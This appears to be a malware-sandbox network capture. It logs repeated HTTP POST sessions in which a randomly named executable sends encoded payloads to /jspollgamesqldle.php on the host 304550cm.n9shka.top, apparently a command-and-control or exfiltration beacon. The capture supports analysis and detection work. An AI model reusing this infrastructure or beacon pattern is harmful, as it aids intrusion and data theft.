                                                          Sep 8, 2024 11:53:36.712651968 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:36 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          112192.168.2.46480280.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:36.842149973 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:37.197089911 CEST2532OUTData Raw: 5b 51 5c 56 5a 58 5e 5c 5c 5a 51 56 57 5a 57 54 50 5c 5e 5a 54 55 53 45 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Q\VZX^\\ZQVWZWTP\^ZTUSETRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^,2-)47*<(',4 '9'!X!)%,07,-;#G X/%
                                                          Sep 8, 2024 11:53:37.530374050 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:37.721091986 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          113192.168.2.46480380.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:37.854850054 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:38.212719917 CEST2532OUTData Raw: 5b 50 5c 57 5a 5a 5b 5e 5c 5a 51 56 57 5e 57 5d 50 59 5e 5a 54 5c 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [P\WZZ[^\ZQVW^W]PY^ZT\SITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&;">_;#00) 0?,V3:;X5*<&0Q([.+#G X/5
                                                          Sep 8, 2024 11:53:38.523876905 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:38.729684114 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:38 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          114192.168.2.46480480.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:38.859571934 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:39.213377953 CEST2532OUTData Raw: 5e 5a 5c 52 5a 53 5e 5a 5c 5a 51 56 57 53 57 57 50 5b 5e 58 54 59 53 47 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^Z\RZS^Z\ZQVWSWWP[^XTYSGTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%_,?:']#\)Z#]09,/V097".!??07//+#G X/
                                                          Sep 8, 2024 11:53:39.555705070 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:39.690282106 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:39 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          115192.168.2.46480580.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:39.809109926 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:40.166369915 CEST2532OUTData Raw: 5b 5c 5c 51 5f 5d 5b 5f 5c 5a 51 56 57 52 57 50 50 58 5e 5b 54 5c 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [\\Q_][_\ZQVWRWPPX^[T\S@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%[,2-\>;^73;>3]':8''S%*+X#-)Y+6$''-+#G X/
                                                          Sep 8, 2024 11:53:40.470690012 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:40.679898977 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          116192.168.2.46480680.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:40.688564062 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:41.040972948 CEST1412OUTData Raw: 5b 51 59 56 5a 5c 5b 5e 5c 5a 51 56 57 5c 57 52 50 5d 5e 5f 54 5b 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [QYVZ\[^\ZQVW\WRP]^_T[S@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%_/"-[>7^ ><,%/%[84/U$8#>Y)&0Q .#G X/
                                                          Sep 8, 2024 11:53:41.381690025 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:41.584310055 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 26 53 24 06 2e 03 20 3e 09 1f 2a 01 07 1c 3a 03 2b 05 29 29 03 0a 29 55 3f 0f 2b 3f 00 5e 29 02 2d 0a 2a 02 38 59 22 21 2f 11 25 35 28 5e 03 11 23 59 36 00 22 10 3d 00 22 5a 3e 57 2c 5f 3e 06 33 11 36 37 3c 1e 23 02 38 5a 22 28 29 09 28 07 2a 1f 3b 27 36 1a 3a 0a 25 0f 21 1e 2d 57 0c 12 20 1a 28 3e 2b 52 20 33 3d 14 26 2d 2a 02 27 26 3a 59 29 16 0c 50 2b 16 0c 11 25 1c 06 09 33 3d 2e 00 29 5e 22 5e 27 29 01 1f 23 2d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: &S$. >*:+)))U?+?^)-*8Y"!/%5(^#Y6"="Z>W,_>367<#8Z"()(*;'6:%!-W (>+R 3=&-*'&:Y)P+%3=.)^"^')#-$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          117192.168.2.46480780.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:40.813303947 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:41.165822029 CEST2532OUTData Raw: 5b 51 5c 5f 5f 59 5b 5f 5c 5a 51 56 57 5c 57 54 50 59 5e 50 54 5a 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Q\__Y[_\ZQVW\WTPY^PTZS@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%].!=*:$4')/?]3?&8'#S'86.2?&#0Q :;#G X/
                                                          Sep 8, 2024 11:53:41.504595041 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:41.637006044 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:41 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          118192.168.2.46480880.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:41.761765957 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:42.118958950 CEST2532OUTData Raw: 5b 58 5c 53 5f 5f 5e 5d 5c 5a 51 56 57 5c 57 56 50 5c 5e 59 54 5a 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [X\S__^]\ZQVW\WVP\^YTZSITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%,.>* !0#(</_$/Z,/S0?^"-.+5;X0Z-#G X/
                                                          Sep 8, 2024 11:53:42.435806036 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:42.570348978 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:41 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          119192.168.2.46480980.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:42.705200911 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:43.056466103 CEST2532OUTData Raw: 5b 5d 59 53 5f 59 5b 5b 5c 5a 51 56 57 5f 57 57 50 5b 5e 5b 54 58 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: []YS_Y[[\ZQVW_WWP[^[TXS@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%]89?*#^4 +*#_%/>84('##>*?%<34 9;#G X/1
                                                          Sep 8, 2024 11:53:43.370001078 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:43.500572920 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:42 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          120192.168.2.46481080.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:43.626348019 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:43.982376099 CEST2532OUTData Raw: 5e 5b 5c 55 5f 5a 5e 5a 5c 5a 51 56 57 52 57 57 50 5f 5e 5c 54 5a 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^[\U_Z^Z\ZQVWRWWP_^\TZSDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%[;1)9; >?0'?%/$9#5=>?&$379#G X/
                                                          Sep 8, 2024 11:53:44.293169022 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:44.416728973 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:43 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          121192.168.2.46481180.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:44.550465107 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:44.900235891 CEST2532OUTData Raw: 5b 5a 59 56 5a 5c 5e 5d 5c 5a 51 56 57 59 57 53 50 5e 5e 59 54 55 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [ZYVZ\^]\ZQVWYWSP^^YTUSCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/1!]>9/ (Y>#X'/1/4?V%)/"=6<,&4?-#G X/)
                                                          Sep 8, 2024 11:53:45.217216015 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:45.344563007 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:44 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          122192.168.2.46481280.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:45.467611074 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:45.822377920 CEST2528OUTData Raw: 5b 50 5c 53 5a 59 5e 5d 5c 5a 51 56 57 5b 57 56 50 50 5e 5c 54 5b 53 47 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [P\SZY^]\ZQVW[WVPP^\T[SGTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\;1):#] V#)Y$,&8'$'* "*<+^$Q -#G X/-
                                                          Sep 8, 2024 11:53:46.141524076 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:46.346350908 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          123192.168.2.46481380.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:46.495265961 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          124192.168.2.46481480.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:46.596179008 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1388
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:46.947154045 CEST1388OUTData Raw: 5b 5a 5c 54 5f 5a 5b 5f 5c 5a 51 56 57 59 57 53 50 58 5e 50 54 5d 53 45 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Z\T_Z[_\ZQVWYWSPX^PT]SETRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%_,W2)']! 0*Z4%?5,;R$:465(@$$$<_-#G X/)
                                                          Sep 8, 2024 11:53:47.275499105 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:47.411120892 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:46 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 26 57 24 06 2e 00 36 10 38 0c 3d 06 2e 0f 39 3d 06 59 3e 3a 2a 1b 3d 23 3b 0b 29 11 31 03 3e 3b 21 45 2a 2c 3c 12 34 57 30 01 26 35 28 5e 03 11 20 02 21 00 39 06 3e 2a 3d 02 3e 1f 2f 05 2a 01 0d 11 21 24 06 52 20 28 20 5a 23 5e 25 0b 3f 07 22 1c 2f 27 2a 19 2d 33 2d 08 36 24 2d 57 0c 12 20 50 28 07 3c 08 23 33 21 5f 25 2d 29 59 24 18 04 5e 3d 06 29 09 28 16 08 59 26 0b 34 0e 30 13 2d 58 3e 2b 2a 5f 26 3a 33 5a 23 2d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: &W$.68=.9=Y>:*=#;)1>;!E*,<4W0&5(^ !9>*=>/*!$R ( Z#^%?"/'*-3-6$-W P(<#3!_%-)Y$^=)(Y&40-X>+*_&:3Z#-$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          125192.168.2.46481580.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:46.720159054 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:47.072067022 CEST2532OUTData Raw: 5e 5e 5c 52 5a 5b 5b 50 5c 5a 51 56 57 59 57 55 50 5c 5e 58 54 59 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^^\RZ[[P\ZQVWYWUP\^XTYSITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%,!.?*7! ,)7Y0?&/'+'"=Z+0$78^9#G X/)
                                                          Sep 8, 2024 11:53:47.391052008 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:47.520620108 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:46 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
